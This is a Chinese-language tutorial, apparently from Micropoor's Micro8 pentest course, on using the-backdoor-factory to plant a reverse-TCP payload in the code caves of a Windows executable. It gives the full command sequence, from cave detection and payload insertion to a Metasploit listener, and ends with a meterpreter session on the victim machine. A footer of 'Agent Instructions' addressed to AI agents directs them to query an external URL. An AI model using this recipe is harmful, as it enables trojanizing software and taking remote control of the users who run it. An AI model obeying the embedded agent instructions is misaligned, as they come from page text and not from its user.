# 第九课:工具介绍-the-backdoor-factory 项目地址: ## 原理 可执行二进制文件中有大量的 00,这些 00 是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp 到代码段,来触发 payload。 ## 以项目中的过磅系统为例: ```bash root@John:~/Desktop# git clone https://github.com/secretsquirrel/the-backdoor-factory.git //安装the-backdoor-factory ``` ![](/files/-LZJwqnlYRh7H5h-1bIk) ```bash root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -S //检测是否支持后门植入 ``` ![](/files/-LZJwqnnxPf0wWxDOnLf) ```bash root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -c -l 150 //测试裂缝空间size150 ``` ![](/files/-LZJwqnpUH0ApLUgJIe7) ```bash root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -s show //查看可用payload ``` ![](/files/-LZJwqnrdey7Kfb796h2) ```bash root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -H 192.168.1.111 -P 8080 -s iat_reverse_tcp_stager_threaded //插入payload,并生成文件。 ``` ![](/files/-LZJwqntGvelhg1wyy0N) ```bash root@John:~/Desktop/the-backdoor-factory# md5sum ./guobang.exe /root/demo/guobang.exe //对比原文件与生成文件MD5值 ``` ![](/files/-LZJwqnv6TkhNpnFTwb9) ```bash root@John:~/Desktop/the-backdoor-factory# du -k ./guobang.exe /root/demo/guobang.exe //对比文件大小 ``` ![](/files/-LZJwqnxzQX0sIVWLXIz) ```bash msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.111 lhost => 192.168.1.111 msf exploit(handler) > set lport 8080 lport => 8080 msf exploit(handler) > exploit -j //开启本地监听 ``` ![](/files/-LZJwqnzy9cnLFdBVB1e) //打开软件\ ![](/files/-LZJwqo05ZzWWs26q4qv) ```bash meterpreter > getuid Server username: John-PC\John ``` //确定目标 ![](/files/-LZJwqo2xVp9DZANqk1m) \--By Micropoor --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://micro8.gitbook.io/micro8/contents-1/1-10/9-gong-ju-jie-shao-thebackdoorfactory.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.